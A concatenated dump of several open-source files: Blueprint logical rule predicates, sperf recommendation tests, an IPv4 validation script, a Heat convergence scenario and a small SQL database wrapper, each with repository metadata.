caa406032938b7e25578bb3a27ddeba8b923fdb0 | 8,887 | py | Python | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | 7 | 2021-08-16T09:17:31.000Z | 2022-02-16T01:27:08.000Z | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | null | null | null | blueprint/py/bp/rules/logical.py | andrey-mishchenko/blueprint-oss | 3bad9258571a0e08c53a9a05061e8461a1e62567 | [
"MIT"
] | 1 | 2021-08-11T20:17:06.000Z | 2021-08-11T20:17:06.000Z | """Logic-related Blueprint rules."""
from dataclasses import dataclass, replace
from typing import Callable, Iterable, Optional, Tuple
from uuid import uuid4
from ..document import Document
from ..entity import Entity
from ..extraction import Field
from ..rule import AtomDegree, AtomScore, DegreeError, Predicate, RuleScore
from ..spatial_formula import (
Conjunction as LogicalConjunction,
Disjunction as LogicalDisjunction,
Formula,
simplify,
)
def _prod(xs: Iterable[float]) -> float:
answer = 1.0
for x in xs:
answer *= x
return answer
def _check_score_degree(entities: Tuple[Entity, ...],
                        degree: AtomDegree) -> None:
    """Raise DegreeError unless *entities* has exactly *degree* elements.

    A degree of 'ANY' accepts any number of entities.
    """
    if degree == 'ANY' or len(entities) == degree:
        return
    raise DegreeError('scoring wrong number of entities; '
                      f'expected {degree}, got {len(entities)}')
def _check_phi_degree(fields: Tuple[Field, ...],
                      degree: AtomDegree) -> None:
    """Raise DegreeError unless *fields* has exactly *degree* elements.

    A degree of 'ANY' accepts any number of fields.
    """
    if degree == 'ANY' or len(fields) == degree:
        return
    raise DegreeError('applying to wrong number of fields; '
                      f'expected {degree}, got {len(fields)}')
@dataclass(frozen=True)
class AllHold(Predicate):
    """Conjunction predicate: scores the product of its children's scores.

    Built via the all_hold() factory, which also computes the shared degree.
    """

    wrapped_predicates: Tuple[Predicate, ...]  # the AND-ed sub-predicates
    degree_: AtomDegree  # common degree of the children ('ANY' if none fixed)

    def __init__(
        self,
        wrapped_predicates: Tuple[Predicate, ...],
        degree_: AtomDegree,
        name: str = 'penalize',  # NOTE(review): default looks copy-pasted from Penalize; all_hold() always passes an explicit name
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )
        # Frozen dataclass: plain attribute assignment would raise, so go
        # through object.__setattr__.
        object.__setattr__(self, 'wrapped_predicates', wrapped_predicates)
        object.__setattr__(self, 'degree_', degree_)

    @property
    def degree(self) -> AtomDegree:
        return self.degree_

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        """Product of the children's scores -- any zero child is fatal."""
        _check_score_degree(entities, degree=self.degree)
        results = tuple(predicate.score(entities, doc)
                        for predicate in self.wrapped_predicates)
        score = _prod(result.score for result in results)
        return AtomScore(score)

    def phi(self, fields: Tuple[Field, ...]) -> Formula:
        """Spatial formula: the simplified AND of the children's formulas."""
        _check_phi_degree(fields, degree=self.degree)
        return simplify(LogicalConjunction(
            predicate.phi(fields) for predicate in self.wrapped_predicates))
def all_hold(*predicates: Predicate) -> Predicate:
    """Says that all of its subrules hold.

    This is the analog of `and` in a normal programming language.

    Technically, the resulting score is the product of the scores of the
    subrules.
    """
    concrete_degrees = {p.degree for p in predicates if p.degree != 'ANY'}
    if len(concrete_degrees) > 1:
        raise DegreeError('all input predicates to all_hold must have same degree; '
                          f'error in {predicates}')
    shared_degree = concrete_degrees.pop() if concrete_degrees else 'ANY'
    joined = ', '.join(sorted(str(p) for p in predicates))
    return AllHold(
        name=f'all_hold({joined})',
        wrapped_predicates=predicates,
        degree_=shared_degree)
@dataclass(frozen=True)
class AnyHolds(Predicate):
    """Disjunction predicate: scores the maximum of its children's scores.

    Built via the any_holds() factory, which also computes the shared degree.
    """

    wrapped_predicates: Tuple[Predicate, ...]  # the OR-ed sub-predicates
    degree_: AtomDegree  # common degree of the children ('ANY' if none fixed)

    def __init__(
        self,
        wrapped_predicates: Tuple[Predicate, ...],
        degree_: AtomDegree,
        name: str = 'penalize',  # NOTE(review): default looks copy-pasted from Penalize; any_holds() always passes an explicit name
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )
        # Frozen dataclass: assign through object.__setattr__.
        object.__setattr__(self, 'wrapped_predicates', wrapped_predicates)
        object.__setattr__(self, 'degree_', degree_)

    @property
    def degree(self) -> AtomDegree:
        return self.degree_

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        """Maximum of the children's scores -- one strong child suffices."""
        _check_score_degree(entities, degree=self.degree)
        results = tuple(predicate.score(entities, doc)
                        for predicate in self.wrapped_predicates)
        score = max(result.score for result in results)
        return AtomScore(score)

    def phi(self, fields: Tuple[Field, ...]) -> Formula:
        """Spatial formula: the simplified OR of the children's formulas."""
        _check_phi_degree(fields, degree=self.degree)
        return simplify(LogicalDisjunction(
            predicate.phi(fields) for predicate in self.wrapped_predicates))
def any_holds(*predicates: Predicate) -> Predicate:
    """Says that at least one of its subrules holds.

    This is the analog of `or` in a normal programming langauge.

    Technically, the score is the maximum of the scores of the subrules.
    """
    concrete_degrees = {p.degree for p in predicates if p.degree != 'ANY'}
    if len(concrete_degrees) > 1:
        raise DegreeError(
            f'all input rules must have same degree; error in {predicates}')
    shared_degree = concrete_degrees.pop() if concrete_degrees else 'ANY'
    joined = ', '.join(sorted(str(p) for p in predicates))
    return AnyHolds(
        name=f'any_holds({joined})',
        wrapped_predicates=predicates,
        degree_=shared_degree)
@dataclass(frozen=True)
class AreDisjoint(Predicate):
    """Says that two fields' assignments have no words in common.

    Scores 0 if the two fields' assignments have any words in common, 1 otherwise.

    NOTE: This doesn't check whether the same *string* appears in the two field
    assignments: it checks whether the two field assignments *share any actual
    typeset words on the page*.
    """

    def __init__(
        self,
        name: str = 'are_disjoint',
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )

    @property
    def degree(self) -> int:
        # Always compares exactly two fields.
        return 2

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        if len(entities) != 2:
            raise DegreeError(f'wrong number of entities passed to {self}.score')
        E1, E2 = entities
        # Set intersection of the actual word objects, not their text.
        if not set(E1.entity_words()) & set(E2.entity_words()):
            return AtomScore(1)
        else:
            return AtomScore(0)


# Shared, stateless instance for use in rule definitions.
are_disjoint = AreDisjoint()
@dataclass(frozen=True)
class Nop(Predicate):
    """No op. Will always score 1."""

    def __init__(
        self,
        name: str = 'nop',
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )

    @property
    def degree(self) -> AtomDegree:
        # Accepts any number of entities.
        return 'ANY'

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        # Unconditionally perfect score; useful as a neutral placeholder.
        return AtomScore(1)
@dataclass(frozen=True)
class Penalize(Predicate):
    """Caps the wrapped predicate's score at max_score.

    Built via the penalize() factory below.
    """

    wrapped_predicate: Predicate
    max_score: float  # upper bound applied to the wrapped score

    def __init__(
        self,
        wrapped_predicate: Predicate,
        max_score: float = 0.7,
        name: str = 'penalize',
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )
        # Frozen dataclass: assign through object.__setattr__.
        object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)
        object.__setattr__(self, 'max_score', max_score)

    @property
    def degree(self) -> AtomDegree:
        # Same arity as the predicate being wrapped.
        return self.wrapped_predicate.degree

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        result = self.wrapped_predicate.score(entities, doc)
        # FIXME: Once we support this in Studio, add back in metadata for
        # pre-penalize score (same for non-fatal below)
        return AtomScore(min(result.score, self.max_score))

    def phi(self, fields: Tuple[Field, ...]) -> Formula:
        # Penalizing does not change the spatial formula.
        return self.wrapped_predicate.phi(fields)
def penalize(wrapped_predicate: Predicate, max_score: float = 0.7) -> Predicate:
    """Wrap *wrapped_predicate* so its score is capped at *max_score*."""
    return Penalize(wrapped_predicate=wrapped_predicate, max_score=max_score)
@dataclass(frozen=True)
class NonFatal(Predicate):
    """Floors the wrapped predicate's score at min_score.

    Built via the non_fatal() factory below.
    """

    wrapped_predicate: Predicate
    min_score: float  # lower bound applied to the wrapped score

    def __init__(
        self,
        wrapped_predicate: Predicate,
        min_score: float = 0.5,
        name: str = 'non_fatal',
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )
        # Frozen dataclass: assign through object.__setattr__.
        object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)
        object.__setattr__(self, 'min_score', min_score)

    @property
    def degree(self) -> AtomDegree:
        # Same arity as the predicate being wrapped.
        return self.wrapped_predicate.degree

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        result = self.wrapped_predicate.score(entities, doc)
        return AtomScore(max(result.score, self.min_score))
def non_fatal(wrapped_predicate: Predicate, min_score: float = 0.5) -> Predicate:
    """Wrap *wrapped_predicate* so its score never drops below *min_score*."""
    return NonFatal(wrapped_predicate=wrapped_predicate, min_score=min_score)
@dataclass(frozen=True)
class Negate(Predicate):
    """Inverts the wrapped predicate's score: 1 - score.

    Built via the negate() factory below.
    """

    wrapped_predicate: Predicate

    def __init__(
        self,
        wrapped_predicate: Predicate,
        name: str = 'negate',
        uuid: Optional[str] = None,
    ):
        super().__init__(
            name = name,
            uuid = str(uuid4()) if uuid is None else uuid,
        )
        # Frozen dataclass: assign through object.__setattr__.
        object.__setattr__(self, 'wrapped_predicate', wrapped_predicate)

    @property
    def degree(self) -> AtomDegree:
        # Same arity as the predicate being wrapped.
        return self.wrapped_predicate.degree

    def score(self, entities: Tuple[Entity, ...], doc: Document) -> RuleScore:
        result = self.wrapped_predicate.score(entities, doc)
        # Keep the rest of the result's metadata; only flip the score.
        return replace(result, score=(1 - result.score))
def negate(wrapped_predicate: Predicate) -> Predicate:
    """Wrap *wrapped_predicate* so it scores 1 minus the wrapped score."""
    return Negate(wrapped_predicate=wrapped_predicate)
| 28.123418 | 80 | 0.68212 |
830d38317439ee3c1af0c103232e9e3b0a93b0d7 | 12,573 | py | Python | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 12 | 2020-05-27T20:21:10.000Z | 2021-10-14T14:39:50.000Z | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 43 | 2020-05-02T07:11:45.000Z | 2021-10-01T15:16:17.000Z | tests/test_recs.py | datastax-labs/sperf | 934248642c4ef6b5d944153fe45628a4bc3825fb | [
"Apache-2.0"
] | 11 | 2020-05-28T16:15:07.000Z | 2021-12-03T07:58:39.000Z | # Copyright 2020 DataStax, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test the recs module"""
import unittest
import types
from pysper import recs
class TestRecs(unittest.TestCase):
    """recs testing.

    Each stage test builds a recs.Stage with one counter pushed over its
    threshold, asserts the expected (reason, rec) pair, then resets the
    counter and asserts that no recommendation remains.
    """

    # Recommendation strings asserted by more than one test, named once so a
    # wording change in pysper.recs only has to be updated in one place.
    MEMTABLE_REC = "lower memtable_cleanup_threshold in cassandra.yaml"
    NTR_REC = ("raise or set -Dcassandra.max_queued_native_transport_requests= "
               "(valid range is 1024-8192)")
    UNCACHED_REC = ("Make more FQ queries uncached. "
                    'Example: change "fq":"status:DELETED" to '
                    '"fq":"{!cached=false}status:DELETED".')

    @staticmethod
    def _stage(name, **counters):
        """Build a recs.Stage with every counter zeroed except *counters*."""
        values = {"pending": 0, "active": 0, "local_backpressure": 0,
                  "completed": 0, "blocked": 0, "all_time_blocked": 0}
        values.update(counters)
        return recs.Stage(name=name, **values)

    def _assert_stage_rec(self, stage, reason, rec, resets, version=None):
        """Analyze *stage*: expect (reason, rec); then apply *resets*
        (attribute -> value) and expect no recommendation at all."""
        analyzer = recs.Engine(None, version)
        got_reason, got_rec = analyzer.analyze_stage(stage)
        self.assertEqual(got_rec, rec)
        self.assertEqual(got_reason, reason)
        for attr, value in resets.items():
            setattr(stage, attr, value)
        got_reason, got_rec = analyzer.analyze_stage(stage)
        self.assertIsNone(got_rec)
        self.assertIsNone(got_reason)

    def _assert_fc_rec(self, stats, reason, rec):
        """Expect analyze_filter_cache_stats(stats) to yield (reason, rec)."""
        got_reason, got_rec = recs.analyze_filter_cache_stats(stats)
        self.assertEqual(got_reason, reason)
        self.assertEqual(got_rec, rec)

    def test_high_pending_write_remote(self):
        """rec on high pending remote writes, cleared below the threshold"""
        self._assert_stage_rec(
            self._stage("TPC/all/WRITE_REMOTE", pending=10001),
            "pending remote writes over 10000", self.MEMTABLE_REC,
            {"pending": 9999})

    def test_high_pending_write_local(self):
        """rec on high pending local writes, cleared below the threshold"""
        self._assert_stage_rec(
            self._stage("TPC/all/WRITE_LOCAL", pending=10001),
            "pending local writes over 10000", self.MEMTABLE_REC,
            {"pending": 9999})

    def test_high_pending_mutations(self):
        """rec on high pending mutations, cleared below the threshold"""
        self._assert_stage_rec(
            self._stage("MutationStage", pending=10001),
            "mutations pending over 10000", self.MEMTABLE_REC,
            {"pending": 9999})

    def test_tpc_backpressure(self):
        """rec on any local backpressure, cleared once it drops to zero"""
        self._assert_stage_rec(
            self._stage("TPC/2", pending=1, local_backpressure=1),
            "local backpressure is present",
            "raise or set tpc_concurrent_requests_limit in "
            "cassandra.yaml (default is 128), if CPU is underutilized.",
            {"pending": 0, "local_backpressure": 0})

    def test_full_memtable(self):
        """rec on an active full-memtable stage"""
        self._assert_stage_rec(
            self._stage("TPC/all/WRITE_MEMTABLE_FULL", active=1),
            "full memtable", self.MEMTABLE_REC,
            {"active": 0})

    def test_full_memtable_completed(self):
        """rec on historically completed full-memtable stages"""
        self._assert_stage_rec(
            self._stage("TPC/all/WRITE_MEMTABLE_FULL", completed=1),
            "full memtable stages previously completed is too high",
            self.MEMTABLE_REC,
            {"completed": 0})

    def test_compactions_behind(self):
        """rec when more than 100 compactions are pending"""
        self._assert_stage_rec(
            self._stage("CompactionManger", pending=101),
            "more than 100 compactions behind",
            "raise compaction_throughput_in_mb in cassandra.yaml",
            {"pending": 0})

    def test_memtable_flush_writer_pending(self):
        """rec when more than 5 flush writers are pending"""
        self._assert_stage_rec(
            self._stage("MemtableFlushWriter", pending=6),
            "memtable flush writers pending over 5",
            "raise memtable_flush_writers in cassandra.yaml",
            {"pending": 0})

    def test_memtable_flush_writer_blocked(self):
        """rec when any flush writer is blocked"""
        self._assert_stage_rec(
            self._stage("MemtableFlushWriter", blocked=1),
            "memtable flush writers blocked greater than zero",
            self.MEMTABLE_REC,
            {"blocked": 0})

    def test_ntr_blocked(self):
        """rec when more than 10 NTRs are currently blocked (3.11.x)"""
        self._assert_stage_rec(
            self._stage("Native-Transport-Requests", blocked=11),
            "blocked NTR over 10", self.NTR_REC,
            {"blocked": 0}, version="3.11.3")

    def test_ntr_all_time_blocked(self):
        """rec when more than 100 NTRs were ever blocked (3.11.x)"""
        self._assert_stage_rec(
            self._stage("Native-Transport-Requests", all_time_blocked=101),
            "more than 100 blocked NTR all time", self.NTR_REC,
            {"all_time_blocked": 0}, version="3.11.3")

    def test_filter_cache_analysis_frequent_evictions(self):
        """evictions more often than every 20s -> raise the item limit"""
        stats = types.SimpleNamespace(
            avg_evict_freq=19.9, avg_evict_duration=10,
            last_evict_item_limit=32000, perc_item_limit=0.95)
        self._assert_fc_rec(
            stats,
            "Filter cache evictions are happening too frequently.",
            "Raise filter cache item limit from 32000 to 256000 "
            "via -Dsolr.solrfiltercache.maxSize.")

    def test_filter_cache_analysis_long_duration_evictions(self):
        """evictions slower than 1s -> lower the item limit"""
        stats = types.SimpleNamespace(
            avg_evict_freq=60.0, avg_evict_duration=1001,
            last_evict_item_limit=256000, perc_item_limit=0.95)
        self._assert_fc_rec(
            stats,
            "Filter cache eviction duration is too long.",
            "Lower filter cache item limit from 256000 to 32000 "
            "via -Dsolr.solrfiltercache.maxSize.")

    def test_filter_cache_analysis_frequent_long_evictions(self):
        """frequent AND slow evictions -> stop caching some FQ queries"""
        stats = types.SimpleNamespace(
            avg_evict_freq=10.0, avg_evict_duration=60001,
            last_evict_item_limit=256000, perc_item_limit=0.95)
        self._assert_fc_rec(
            stats,
            "Filter cache evictions are happening too frequently and too slowly.",
            self.UNCACHED_REC)

    def test_limit_eviction_limit_already_reached(self):
        """slow evictions but the limit is already minimal -> uncache FQs"""
        stats = types.SimpleNamespace(
            avg_evict_freq=100.0, avg_evict_duration=1244.0,
            last_evict_item_limit=31000, perc_item_limit=0.95)
        self._assert_fc_rec(
            stats,
            "Filter cache eviction duration long but limit is already too low.",
            self.UNCACHED_REC)

    def test_filter_cache_analysis_zero_set(self):
        """all-zero stats produce no recommendation"""
        stats = types.SimpleNamespace(
            avg_evict_freq=0.0, avg_evict_duration=0.0, perc_item_limit=0.0)
        self._assert_fc_rec(stats, None, None)

    def test_filter_cache_analysis_none_set(self):
        """an empty stats object produces no recommendation"""
        self._assert_fc_rec(types.SimpleNamespace(), None, None)
| 37.198225 | 101 | 0.619502 |
13cd859d1acb8a6c02f5ae17b43725a486dc5bad | 1,058 | py | Python | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | exercicios_antigos/desafios/arquivos_endereco_ip.py | jfklima/prog_pratica | 72c795e3372e46f04ce0c92c05187aec651777cf | [
"MIT"
] | null | null | null | # arquivo de endereços ip
# arquivo de endereços ip validados
# enderecos de ip valido são aqueles que tem quatro números sepados por ponto e
# que cada número não pode ultrapassar o valor de 255 ou seja não pode ser
# maior que 255
def validar(ip):
    """Return True if *ip* is a valid dotted-quad IPv4 address.

    Valid means exactly four fields separated by '.', each a decimal
    number between 0 and 255 inclusive.
    """
    numeros = ip.split('.')
    if len(numeros) != 4:
        return False
    for n in numeros:
        # isdigit() rejects empty fields, signs, spaces and letters, so the
        # int() below cannot raise.  The original called int(n) directly and
        # crashed with ValueError on malformed input such as "a.b.c.d".
        if not n.isdigit() or not (0 <= int(n) <= 255):
            return False
    return True
# Partition the addresses from enderecos_ip.txt into valid and invalid lists.
ips_validos = []
ips_invalidos = []

with open("enderecos_ip.txt", 'r') as arquivo:
    for linha in arquivo:
        ip = linha.strip()
        if validar(ip):
            ips_validos.append(ip)
        else:
            ips_invalidos.append(ip)

# Write both groups to the report file: valid addresses first, then a blank
# separator, then the invalid ones.
with open("enderecos_ip_validado.txt", 'w') as arquivo:
    arquivo.writelines('[Endereços válidos:]\n')
    for ip_valido in ips_validos:
        arquivo.writelines(f"{ip_valido}\n")
    arquivo.writelines('\n')
    arquivo.writelines('\n')
    arquivo.writelines('[Endereços inválidos:]\n')
    for ip_invalido in ips_invalidos:
        arquivo.writelines(f"{ip_invalido}\n")
| 25.190476 | 79 | 0.642722 |
a969ba7c4229c588d38e01f66824780334ab253e | 1,639 | py | Python | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 265 | 2015-01-02T09:33:22.000Z | 2022-03-26T23:19:54.000Z | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 8 | 2015-09-01T15:43:19.000Z | 2021-12-14T05:18:23.000Z | heat/tests/convergence/scenarios/multiple_update.py | noironetworks/heat | 7cdadf1155f4d94cf8f967635b98e4012a7acfb7 | [
"Apache-2.0"
] | 295 | 2015-01-06T07:00:40.000Z | 2021-09-06T08:05:06.000Z | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Convergence scenario: repeated stack updates (shrink, then grow, then
# delete).  Template, RsrcDef, GetRes, GetAtt, engine and verify are
# presumably injected into this file's namespace by the scenario test
# framework -- there are no imports here.

# Initial stack: C depends on A and B; D references C; E uses an attribute of C.
example_template = Template({
    'A': RsrcDef({}, []),
    'B': RsrcDef({}, []),
    'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
    'D': RsrcDef({'c': GetRes('C')}, []),
    'E': RsrcDef({'ca': GetAtt('C', 'a')}, []),
})
engine.create_stack('foo', example_template)
engine.noop(5)
engine.call(verify, example_template)

# First update: shrink the stack by dropping resource E.
example_template_shrunk = Template({
    'A': RsrcDef({}, []),
    'B': RsrcDef({}, []),
    'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
    'D': RsrcDef({'c': GetRes('C')}, []),
})
engine.update_stack('foo', example_template_shrunk)
engine.noop(10)
engine.call(verify, example_template_shrunk)

# Second update: grow the stack again, restoring E and adding F on top.
example_template_long = Template({
    'A': RsrcDef({}, []),
    'B': RsrcDef({}, []),
    'C': RsrcDef({'a': '4alpha'}, ['A', 'B']),
    'D': RsrcDef({'c': GetRes('C')}, []),
    'E': RsrcDef({'ca': GetAtt('C', 'a')}, []),
    'F': RsrcDef({}, ['D', 'E']),
})
engine.update_stack('foo', example_template_long)
engine.noop(12)
engine.call(verify, example_template_long)

# Finally delete everything and confirm the stack is empty.
engine.delete_stack('foo')
engine.noop(6)
engine.call(verify, Template({}))
| 32.137255 | 78 | 0.61928 |
788e12b31825b6459f6b7cca6f98ec7680998208 | 7,859 | py | Python | kbr/dbase/__init__.py | brugger/kbr-tools-dbase | 0704e14c48bde6a9233b649ec12992e99a8cac73 | [
"MIT"
] | 1 | 2021-02-02T09:47:40.000Z | 2021-02-02T09:47:40.000Z | kbr/dbase/__init__.py | brugger/kbr-tools-dbase | 0704e14c48bde6a9233b649ec12992e99a8cac73 | [
"MIT"
] | 1 | 2021-08-04T13:00:00.000Z | 2021-08-04T13:00:00.000Z | kbr/db_utils.py | brugger/kbr-tools | 95c8f8274e28b986e7fd91c8404026433488c940 | [
"MIT"
] | null | null | null | """
Generica low level function for interacting with a database through the records package
"""
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import records
class DB( object ):
    """ Thin convenience wrapper around a records.Database connection.

    NOTE(review): queries are assembled by naive string interpolation --
    values are wrapped in single quotes but not otherwise escaped -- so
    this class must only ever be fed trusted input.
    """

    def __init__( self, url:str) -> bool:
        """ connects to a database instance

        Args:
          url: as specified by sqlalchemy ( {driver}://{user}:{password}@{host}:{port}/{dbase}

        Returns:
          none

        Raises:
          RuntimeError on failure.

        """

        self._db = records.Database( url )
        # sqlite rows must be fetched eagerly, otherwise they are lost
        # once the underlying cursor is reused.
        self._fetchall = False
        if url.startswith('sqlite'):
            self._fetchall = True

    def close(self):
        """ Closes the db connection
        """
        self._db.close()

    def from_file(self, filename:str):
        """ readin a sql file and execute the content

        Statements are split on ';', so the file must not contain ';'
        inside string literals.

        Args:
          filename: file to read from

        Returns:
          None

        Raises:
          RuntimeError on file not exist or sql errors
        """
        if not os.path.isfile( filename ):
            raise RuntimeError( "Files does not exist '{}'".format( filename ))

        # context manager guarantees the handle is closed even on errors
        with open(filename, 'r') as file_handle:
            content = file_handle.read()

        for command in content.replace("\n", " ").split(';'):
            if command.strip() == "":
                continue
            self.do(command)

    def table_names(self) -> []:
        """ get the names of the tables in the database

        Args:
          None

        returns
          table names in a list

        raises:
          None
        """
        return self._db.get_table_names()

    def table_exist(self, name:str) -> bool:
        """ check whether a table exists.

        PostgreSQL specific: relies on to_regclass().

        Args:
          name: table name to check for

        Returns:
          True if the table exists, otherwise False
        """
        q = f"SELECT to_regclass('{name}')"
        # bug fix: get_as_dict() is defined on this wrapper, not on the
        # raw records.Database object.
        table = self.get_as_dict( q )
        if table[0]['to_regclass'] is None:
            return False

        return True

    def drop_tables(self) -> None:
        """ Delete all tables in a database, useful if resetting it during development """
        for table in self.table_names():
            # bug fix: previously referenced the undefined global 'db'
            self.do("DROP table IF EXISTS {} CASCADE".format( table ))

    def do(self, sql:str) -> None:
        """ execute a query

        Args:
          sql: query to execute

        returns
          the result of the query

        raises:
          None
        """
        return self._db.query( sql, fetchall=self._fetchall )

    def get_as_dict(self, sql:str) -> {}:
        """ executes a query and returns the data as a dict

        Args:
          sql query to execute

        Returns:
          result as a dict, or dict list

        Raises:
          None
        """
        return self.do( sql ).as_dict()

    def count(self, sql:str) -> int:
        """ executes a query and returns the number of rows generated

        Args:
          sql query to execute

        Returns:
          nr of rows, 0 if none found

        Raises:
          None
        """
        res = self.do( sql ).all()
        return len( res )

    def get(self, table, logic:str='AND', order:str=None, limit:int=None, offset:int=None, **values ) -> {}:
        """ fetch rows from a table, optionally filtered, ordered and paged

        Args:
          table: table to select from
          logic: 'AND'/'OR' used to combine the filters
          order: content for an ORDER BY clause
          limit, offset: paging controls
          values: column=value equality filters (None values are skipped)

        Returns:
          list of row dicts
        """
        q = "SELECT * FROM {table} ".format( table = table )
        filters = []
        for key in values.keys():
            if ( values[ key ] is not None):
                filters.append( " {key} = '{value}'".format( key=key, value=values[ key ]))

        if ( filters != []):
            q += " WHERE " + " {} ".format( logic ).join( filters )

        if order is not None:
            q += " ORDER BY {order}".format( order=order )

        if limit is not None:
            q += " limit {} ".format( limit )

        if offset is not None:
            q += " offset {} ".format( offset )

        return self.get_as_dict( q )

    def get_single(self, table, **values ) -> {}:
        """ like get(), but expects at most one matching row

        Returns:
          the row dict, or None if nothing matched

        Raises:
          RuntimeError if more than one row matched
        """
        values = self.get(table, **values)
        if len( values ) > 1:
            raise RuntimeError('get_single returned multiple values')
        elif len( values ) == 1:
            return values[ 0 ]
        else:
            return None

    def get_all( self, table:str, order:str=None):
        """ fetch every row in a table, optionally ordered """
        return self.get(table=table, order=order)

    def get_by_id(self, table, value ) -> {}:
        """ fetch rows whose 'id' column equals value """
        return self.get( table, id=value)

    def escape_string(self, string):
        """ wrap a value in single quotes for SQL interpolation
        (no real escaping is done -- see class note) """
        return "'{}'".format( string )

    def get_id(self, table, **values ) -> id:
        """ fetch the 'id' column of matching rows

        Returns:
          None if no match, the single id, or a list of ids
        """
        ids = []
        for res in self.get(table, **values):
            ids.append( res[ 'id' ])

        if len( ids ) == 0:
            return None
        elif len( ids ) == 1:
            return ids[ 0 ]
        else:
            return ids

    def add( self, table:str, entry:{}):
        """ insert a single row built from the entry dict

        Raises:
          RuntimeError if entry is empty
        """
        if entry == {}:
            raise RuntimeError('No values provided')

        keys = list( entry.keys())
        values = entry.values()

        q = "INSERT INTO {table} ({keys}) VALUES ({values})".format( table = table,
                                                                     keys=",".join(keys),
                                                                     values=",".join(map( self.escape_string, values)))
        self.do( q )

    def add_unique( self, table:str, entry:{}, key:str):
        """ insert a row unless one with the same value for key exists

        Returns:
          the id(s) of the row(s) matching entry[key]
        """
        if entry == {}:
            raise RuntimeError('No values provided')

        ids = self.get_id( table, **{key:entry[ key ]})
        if ids is not None:
            return ids

        try:
            self.add( table, entry )
        except Exception:
            # narrowed from a bare 'except:' so KeyboardInterrupt et al.
            # still propagate. Expect the value already to have been added
            # in the mean time...
            pass

        return self.get_id( table, **{key: entry[ key ]})

    def add_bulk( self, table:str, entries:[] ):
        """ insert multiple rows with a single INSERT statement

        All entry dicts must share the same keys.
        """
        if entries == [] or entries == {}:
            raise RuntimeError('No values provided')

        all_values = []
        keys = list(entries[ 0 ].keys())
        for entry in entries:
            if keys != list(entry.keys()):
                raise RuntimeError( 'Not the same keys in all entries!')
            values = entry.values()
            all_values.append( "({values})".format( values=",".join( map(self.escape_string, values))))

        q = "INSERT INTO {table} ({keys}) VALUES {values}".format( table = table,
                                                                   keys=",".join(keys),
                                                                   values=",".join(all_values))
        self.do( q )

    def update(self, table:str, entry:{}, conditions:{}):
        """ update rows matching conditions with the values in entry

        Keys present in conditions are not written as updates.
        """
        if entry == {}:
            raise RuntimeError('No values provided')

        if conditions == [] :
            raise RuntimeError('No conditions provided')

        updates = []
        for key, value in entry.items():
            if ( key in conditions ):
                continue
            updates.append( "{key} = '{value}'".format( key=key, value=value))

        conds = []
        for key in conditions:
            conds.append( "{key} = '{value}'".format( key=key, value=conditions[ key ]))

        q = "UPDATE {table} set {updates} WHERE {conds}".format( table = table,
                                                                 updates=", ".join(updates),
                                                                 conds=" and ".join(conds))
        self.do( q )

    def delete(self, table:str, id:int):
        """ delete the row(s) whose id column equals id """
        q = "DELETE FROM {table} WHERE id = '{id}'".format( table = table,
                                                            id=id)
        self.do( q )
| 24.107362 | 119 | 0.473088 |
2a7e9b3c03bd16bc817718fed5aa6386ae79b749 | 7,069 | py | Python | data/p3BR/R2/benchmark/startQiskit_QC302.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
